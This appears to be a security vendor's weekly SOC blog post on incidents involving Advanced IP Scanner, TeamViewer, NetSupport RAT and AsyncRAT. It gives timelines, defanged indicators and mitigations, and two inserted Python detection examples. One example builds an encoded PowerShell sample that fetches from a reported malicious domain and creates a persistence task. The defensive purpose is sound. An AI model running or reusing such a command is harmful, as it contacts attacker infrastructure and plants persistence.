Context, Official Statements, and Possible Solutions for Today’s CrowdStrike BSOD – Windows Host Outage

Before we begin our planned weekly incident analysis, the entire Adversary Pursuit Group and everyone else here at Blackpoint Cyber want to extend good energy to all those IT teams pulling all-nighters for the next few days to get rid of the Blue Screens of Death (BSOD) currently impacting Windows hosts as a result of the flawed Falcon content update — as well as the teams at CrowdStrike and Windows currently pulling together to fix the rollout for all Falcon customers.

As MacKensie Brown, VP of the APG, said today while waiting for her flight at an impacted airport:

While the fix is somewhat simple (albeit extremely manual for recovery), IT operations will be working full throttle. Our thoughts are with those teams, and if anyone needs help, please reach out.

For more information on today’s outage (updated July 20, 2024):

Now, let’s get back to your regularly scheduled Blackpoint Active SOC incident analysis!

Blackpoint Active SOC Weekly Analysis Summary for July 19, 2024

Between July 10-17, 2024, Blackpoint’s Active Security Operations Center (SOC) responded to 122 total incidents. These incidents included 18 on-premises MDR incidents, 2 Cloud Response for Google Workspace, and 102 Cloud Response for Microsoft 365 incidents, with confirmed or likely threat actor use of:

In this blog, we’ll dive into the details behind these select incidents, including why they’re important for partners to account for today – even if they’ve not been attacked yet! – as well as possible mitigations leveraging your current tech stack and Blackpoint Cyber.


Advanced IP Scanner and TeamViewer Incident with Real Estate Partner on July 10, 2024

Topline Takeaways

  • Industry target: Real Estate
  • Attacker information:
    • Advanced IP Scanner
    • TeamViewer
    • attrib.exe
    • Arechclient2 malware
  • Antivirus (AV) and / or EDR present in environment? Yes
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is very likely that threat actors will continue to use Advanced IP Scanner for discovery and TeamViewer for persistence to exploit other Real Estate organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Multifactor authentication (MFA)
    • Application allowlisting and blocklisting
    • Heuristics-based activity monitoring and remediation
    • Dedicated software center

Advanced IP Scanner and TeamViewer Incident Timeline for 2024-07-10

  • Blackpoint’s MDR+R technology alerted to potential theft of passwords and browser information on the host of a Real Estate partner.
  • During their initial investigation, the Active SOC team saw msbuild.exe calling out to a malicious Russian IP.
    • The compromised user account used attrib.exe to hide Advanced IP Scanner.
    • One second later, the threat actor used Advanced IP Scanner in portable mode, renamed to “1644.exe”.
  • Active SOC analysts also observed TeamViewer used at the same time as Advanced IP Scanner.
    • They noted the malicious file “setup164.exe” in the same folder, which has been classified as malware.
    • The user account then grabbed payloads through an unauthorized TeamViewer session.
  • The Active SOC team isolated the impacted device prior to any malware payload deployment, and contacted the Real Estate partner to relay the identified information along with additional remediation advice.
  • Post-incident analysis links the observed Russian IP address, 45.141.87[.]16, to Arechclient2 malware infrastructure (1).
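As an added example (not Blackpoint's detection logic or code from this page), here is a small Python check that runs three of the behaviors in this timeline against constructed Sysmon-style events: attrib.exe hiding an executable, a binary whose on-disk name differs from its embedded OriginalFileName (the renamed Advanced IP Scanner), and msbuild.exe connecting to a public address. The event field names and the assumption that OriginalFileName is available from the PE version resource are this example's, not the page's.

```python
import ipaddress
import re

# Constructed Sysmon-style events mirroring the timeline above (process creation with the
# binary's embedded OriginalFileName, plus a network connection); not the partner's telemetry.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\attrib.exe",
     "cmdline": r'attrib +h "C:\Users\jdoe\Downloads\1644.exe"'},
    {"type": "process", "image": r"C:\Users\jdoe\Downloads\1644.exe",
     "cmdline": "1644.exe /portable", "original_name": "advanced_ip_scanner.exe"},
    {"type": "network", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "dst_ip": "45.141.87.16", "dst_port": 443},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe", "original_name": "NOTEPAD.EXE"},
]

# attrib.exe setting the hidden attribute on an executable, as seen one second before the scan.
HIDE_EXE = re.compile(r"\+h\b.*\.exe\b", re.IGNORECASE)

# Build tooling that has no business initiating connections to the Internet on a workstation.
NO_NETWORK_EXPECTED = {"msbuild.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Return one finding per matched rule, in event order."""
    findings = []
    for ev in events:
        name = basename(ev["image"])
        if ev["type"] == "process":
            if name == "attrib.exe" and HIDE_EXE.search(ev.get("cmdline", "")):
                findings.append({"rule": "attrib-hide-executable", "image": name,
                                 "detail": ev["cmdline"]})
            original = ev.get("original_name", "")
            # A PE whose on-disk name differs from its version-resource OriginalFileName was
            # renamed; legitimate installers do this too, so treat it as a triage lead.
            if original and original.lower() != name:
                findings.append({"rule": "renamed-binary", "image": name,
                                 "detail": f"OriginalFileName={original}"})
        elif ev["type"] == "network":
            dst = ipaddress.ip_address(ev["dst_ip"])
            if name in NO_NETWORK_EXPECTED and dst.is_global:
                findings.append({"rule": "lolbin-outbound", "image": name,
                                 "detail": f"{dst}:{ev['dst_port']}"})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"[{f['rule']}] {f['image']}: {f['detail']}")
```

The renamed-binary rule fires on any mismatch, so pair it with the allowlisting recommendation below rather than treating it as a conviction on its own.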

More About Advanced IP Scanner, TeamViewer, and Arechclient2 Malware


Advanced IP Scanner is a free network scanner used to analyze local area networks (LANs) (3), and can:

  • Show all network devices,
  • Grant access to shared folders, and
  • Remotely control and switch off computers.

Advanced IP Scanner has been frequently abused by threat groups for reconnaissance and discovery activities. In fact, the Adversary Pursuit Group detailed an incident last week that reviewed the use of Advanced IP Scanner by threat actors, combined with additional abuse of remote desktop protocol (RDP) and multiple brute force attempts to access the environment (4).


TeamViewer is a remote administration tool that can be used to remotely access machines and conduct regular maintenance activities such as system updates, as well as remote installation and removal of software and services.

Threat actors often find remote management tools an attractive target to exploit and abuse during cyberattacks (5), due to:

  • The access TeamViewer and other remote admin tools provide;
  • The ability to remain undetected and blend into normal environment traffic, evading EDR and AV detections; and
  • The potential for persistent access to compromised networks.


Arechclient2 is a .NET RAT with numerous capabilities, including multiple stealth functions. Blue teams and security researchers have previously observed threat actors using Arechclient2 malware to conduct a wide variety of malicious activities (2), including:

  • Profiling victim systems;
  • Stealing information, such as browser and crypto-wallet data; and
  • Launching a hidden secondary desktop to control browser sessions.

APG Threat Analysis of Advanced IP Scanner and TeamViewer Abuse for 2024


The APG predicts that threat actors will very likely continue to abuse legitimate tools – such as Advanced IP Scanner for discovery and TeamViewer for persistence – over the next 12 months.

We assess that threat actors will very likely continue to abuse legitimate tools, such as Advanced IP Scanner and TeamViewer, over the next 12 months. This assessment is based on attacks observed internally by Blackpoint, as well as external incident reports detailing the abuse of these tools during cyber incidents.

The APG has tracked at least 21 ransomware operations that have been observed using Advanced IP Scanner during reported incidents, including:

  • INC Ransom
  • Akira
  • Phobos

We’ve also tracked at least four ransomware operations that have used TeamViewer during reported incidents, including:

  • BianLian
  • LockBit
  • Trigona

As for external reports, a particularly relevant report on the abuse of TeamViewer and other RMM tools was published just last month.

In June 2024, the Health Information Sharing and Analysis Center (Health-ISAC) issued a warning about threat actors exploiting the TeamViewer software to gain persistent access to victim networks.

The warning related to APT29’s (AKA Cozy Bear, Midnight Blizzard) reported compromise of TeamViewer (6). Threat actors target RMM tools, such as TeamViewer, because these tools are often integrated into client networks in a way that provides privileged access to the threat actors. Threat actors will very likely continue both targeting RMM tools for compromise to access their clients and deploying the tools for remote access during active incidents over the next 12 months.

Recommended Advanced IP Scanner and TeamViewer Abuse Mitigations and Remediations


Blackpoint’s APG recommends the following actions to help mitigate the malicious abuse of legitimate tools such as Advanced IP Scanner and TeamViewer.

  • Enable multi-factor authentication (MFA), which can help identify malicious or anomalous logins and require an additional step for securing user accounts.
  • Implement application controls to help manage and control the installation of software, including network scanners.
  • Monitor system activity through heuristics-based triggers and alerts, which can aid in identifying the malicious install, use, and presence of unapproved tools and malicious activities on devices.
  • Provide a dedicated software center, which allows employees to download approved software from a safe and monitored location. Dedicated and approved software can aid in detecting software, such as Advanced IP Scanner, that is installed from a third-party location outside of a dedicated center.


NetSupport RAT Incident with Technology Partner on July 10, 2024

Topline Takeaways

  • Industry target: Technology
  • Attacker information:
    • NetSupport RAT
    • wscript.exe
    • .js initial access file
  • Antivirus (AV) and / or EDR present in environment? Yes
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is very likely that threat actors will continue to use NetSupport RAT for persistence to exploit other Technology organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Employee security training
    • Scripting language controls
    • Multifactor authentication (MFA)
    • Zero trust network architecture

NetSupport RAT Incident Timeline for 2024-07-10

  • Blackpoint’s MDR+R technology alerted to a suspicious PowerShell detection on the host of a Technology partner.
  • Upon further investigation by the Active SOC, it is likely the initial access vector was the execution of a .js file via wscript.exe.
    • After the execution, Active SOC analysts observed powershell.exe calling out to an external domain and reading base64-encoded PowerShell hosted on the domain’s web page.
    • The domain identified, hxxp[://]dfwreds[.]com/data[.]php?9351, has been associated with the NetSupport RAT (7).
  • The Active SOC team isolated the affected host to prevent additional malicious activity, before reaching out to the Real Estate partner with more information and remediation advice.

More About NetSupport RAT


NetSupport Manager is a legitimate remote support tool that has been frequently abused by multiple threat actors (8). NetSupport RAT is a malicious spinoff of the legitimate NetSupport Manager that can:

  • Transfer files,
  • Remotely access compromised environments,
  • Keylog, and
  • Take control of system resources.

The Adversary Pursuit Group (APG) has previously detailed incidents that involved the likely use of NetSupport RAT, including multiple NetSupport RAT attacks during late June 2024 against Real Estate, Institutions & Organizations, and Industrials partners (9). The tool is used by multiple threat groups due to its availability and capabilities; therefore, post-incident attribution can be difficult.

APG Threat Analysis of NetSupport RAT for 2024


The APG predicts that threat actors will very likely continue to use NetSupport RAT for persistence over the next 12 months.

We base this assessment on internal Blackpoint observed attacks which correspond to multiple external incident reports covering NetSupport RAT use.

For example, in March 2024, Perception Point researchers reported on a campaign, PhantomBlu, that involved the deployment of the NetSupport RAT (10). The threat actors delivered email messages that appeared to be from an accounting service, luring victims into downloading an attached Office Word file.

Recommended NetSupport RAT Mitigations and Remediations


The APG recommends the following actions to help mitigate the use of NetSupport RAT for malicious activities.

  • Conduct employee security awareness training, including how to spot a phishing email and how and when to report one to an incident response authority. As many threat actors still rely on social engineering tactics to gain initial access, security training can help lower the risk of users downloading malicious software, or legitimate tools later used for malicious actions.
  • Minimize the use of – or implement strict controls on – scripting languages, which can limit threat actors’ ability to leverage scripts for malicious actions on compromised end user accounts.
  • Require multifactor authentication (MFA) and VPN use where feasible, ensuring only identified and authorized employees can access sensitive data and resources with an additional level of credential authentication.
  • Operate from a zero-trust mentality, which assumes that all requests to each resource are malicious, and encourages aggressive and continuous monitoring and management.


AsyncRAT Incident with Financials Partner on July 15, 2024

Topline Takeaways

  • Industry target: Financials
  • Attacker information:
    • AsyncRAT
    • Scheduled task “TvMusic2”
    • wscript.exe
  • Antivirus (AV) and / or EDR present in environment? Yes (EDR)
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use AsyncRAT for persistence to exploit other Financials organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Employee security training
    • Least-privilege access controls
    • Heuristics-based activity monitoring and remediation
    • Password managers

AsyncRAT Incident Timeline for 2024-07-15

  • Blackpoint’s MDR+R technology alerted to a threat mitigation on a Financials partner’s hosts.
  • The Active SOC team conducted further investigation, identifying suspicious obfuscated PowerShell scripts.
    • These PowerShell scripts remotely connected to domains and various IP addresses with poor reputations, while also creating a malicious scheduled task called “TvMusic2”.
    • Previous reports connect one IP address, 193.26.115[.]78, to the AsyncRAT malware variant (11).
  • Active SOC analysts isolated the affected devices to prevent any further malicious activity, and then reached out to the Financials partner to discuss incident details and additional remediation recommendations.
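Both the NetSupport RAT incident above (powershell.exe reading base64-encoded PowerShell from a web page) and this AsyncRAT incident (obfuscated PowerShell creating the scheduled task “TvMusic2”) turn on what an encoded command line actually contains. As an added example that is not code from this page or from Blackpoint, the Python below decodes a -EncodedCommand argument, extracts URLs, IP addresses and scheduled task names from the result, and renders them in the defanged notation this writeup uses. The sample command line is constructed around a placeholder script that only carries the indicators reported here, and the list of accepted -EncodedCommand spellings is an assumption about the common prefixes.

```python
import base64
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand; this covers the common spellings.
ENC_FLAG = re.compile(r"-e(?:c|nc?|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\";)]+", re.IGNORECASE)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# schtasks ... /tn <name>  or  Register-ScheduledTask -TaskName <name>
TASK_RE = re.compile(r"(?:/tn|-TaskName)\s+[\"']?([^\s\"']+)", re.IGNORECASE)

# Constructed placeholder script and command line; the real scripts in these incidents were
# obfuscated and are not reproduced here. The indicators are the ones reported on this page.
SAMPLE_SCRIPT = ("$u='http://dfwreds.com/data.php?9351'; $ip='193.26.115.78'; "
                 "Invoke-WebRequest $u; schtasks /create /tn TvMusic2")
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the UTF-16LE script behind -EncodedCommand, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))  # tolerate stripped padding
    return raw.decode("utf-16-le", errors="replace")


def defang(indicator: str) -> str:
    """Render an indicator in the hxxp[://] / 1.2.3[.]4 form used in this writeup."""
    if re.fullmatch(r"(?:\d{1,3}\.){3}\d{1,3}", indicator):
        head, _, last = indicator.rpartition(".")
        return f"{head}[.]{last}"
    out = re.sub(r"^http", "hxxp", indicator, flags=re.IGNORECASE)
    return out.replace("://", "[://]").replace(".", "[.]")


def triage(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line and pull out network and persistence leads."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "script": None, "urls": [], "ips": [], "tasks": []}
    return {
        "encoded": True,
        "script": script,
        "urls": [defang(u) for u in URL_RE.findall(script)],
        "ips": [defang(i) for i in IP_RE.findall(script)],
        "tasks": TASK_RE.findall(script),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print(result["script"])
    print("urls:", result["urls"], "ips:", result["ips"], "tasks:", result["tasks"])
```

Nothing here contacts the extracted hosts; the decoded script is only inspected as text, which is the safe way to triage a command line pulled from an alert.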

More About AsyncRAT


Active since at least 2019, AsyncRAT is a remote access trojan (RAT) whose capabilities include but are not limited to:

  • Capturing keystrokes on the victim’s machine,
  • Gaining persistence via scheduled tasks,
  • Viewing the screen, and
  • Examining running processes (12).

Multiple threat groups use AsyncRAT, which makes attribution more difficult.

Finally, AsyncRAT is often distributed via:

  • Email campaigns with malicious attachments,
  • Infected ads on compromised websites, and
  • Other malware variant drops.

APG Threat Analysis of AsyncRAT for 2024


The APG predicts that threat actors will likely continue to use AsyncRAT for persistence over the next 12 months.

This assessment is based on a wide range of Active SOC-observed attacks within Blackpoint-protected environments, including other publicly analyzed attacks on (13):

In addition to the APG’s own internal analysis, AsyncRAT makes frequent appearances in external security research, including:

  • In January 2024, AT&T Alien Labs security researchers reported a campaign delivering AsyncRAT through an initial JavaScript file embedded in a phishing page (14), involving more than 300 samples and over 100 domains.
  • In July 2024, eSentire security researchers reported several instances of users downloading the ScreenConnect remote access client, ultimately leading to AsyncRAT deployment (15).
    • In one case, a user downloaded the ScreenConnect instance from a compromised WordPress website, which redirected the user to a malicious site and eventually AsyncRAT’s download.

Recommended AsyncRAT Mitigations and Remediations


The APG recommends the following actions to help mitigate the deployment and use of AsyncRAT for persistence and exfiltration.

  • Conduct employee security awareness training, including how to spot a phishing email and how and when to report them to an incident response authority.
  • Implement the practice of least privilege, which will help ensure regular user accounts are unable to install certain tools or conduct certain activities.
  • Monitor system activity through heuristics-based triggers and alerts, which can help identify legitimate software being installed or used in suspicious or abnormal ways and surface the associated behaviors.
  • Require the use of secure password managers, disabling plaintext password storage and local password caching to make accessing passwords by threat actors from compromised accounts more difficult.

References and Resources

A quick note on incident details:

As these analyses concern recent incidents in actively monitored environments, certain details may be occasionally omitted and / or obfuscated, to better secure our partners and protect any still-ongoing investigations.

However, we felt that these incidents were important enough to bring to the community’s attention as fast as possible, and so included them in this public writeup.

Please feel free to reach out to the APG directly if you have any questions about a specific incident!

  1. VirusTotal’s Repository: “45.141.87.16 (45.141.84.0/22)” by VirusTotal on 2024-07-17
  2. Blackpoint Cyber’s Whitepaper: “Ratting Out Arechclient2” by Blackpoint Cyber on 2022-11
  3. Advanced IP Scanner’s Website: “Advanced IP Scanner” by Famatech Corp. on N/A
  4. Blackpoint Cyber’s Blog: “LuminousMoth, Tnega Malware, Advanced IP Scanner, RDP Abuse, and SolarMarker” by Blackpoint Cyber on 2024-07-11
  5. Blackpoint Cyber’s Blog: “Vulnerable RMM Tools and Vulnerable Industries: Why Vigilance is Key” by Blackpoint Cyber on 2024-03-28
  6. The HIPAA Journal’s Blog: “Health-ISAC Issues Warning Abuse of TeamViewer Remote Connectivity Software” by Steve Adler on 2024-06-28
  7. VirusTotal’s Repository: “hxxp://dfwreds[.]com/data.php?9351” by VirusTotal on 2024-07-17
  8. VMware’s Blog: “NetSupport RAT: The RAT King Returns” by Alan Ngo; Abe Schneider; Fae Carlisle on 2023-11-20
  9. Blackpoint Cyber’s Blog: “Brute Ratel, Advanced IP Scanner, and NetSupport RAT” by Blackpoint Cyber on 2024-06-28
  10. Perception Point’s Blog: “Operation PhantomBlu: New and Evasive Method Delivers NetSupport RAT” by Areal Davidpur; Peleg Cabra on 2024-03-18
  11. VirusTotal’s Repository: “193.26.115.78 (193.26.115.0/24)” by VirusTotal on 2024-07-17
  12. MITRE’s Repository: “AsyncRAT” by MITRE on 2023-10-10
  13. Blackpoint Cyber’s Blog: “AsyncRAT, NetSupport RAT, and VssAdmin Abuse for Shadow Copy Deletion” by Blackpoint Cyber on 2024-06-21
  14. AT&T’s Blog: “AsyncRAT loader: Obfuscation, DGAs, decoys and Govno” by Fernando Martinez on 2024-01-05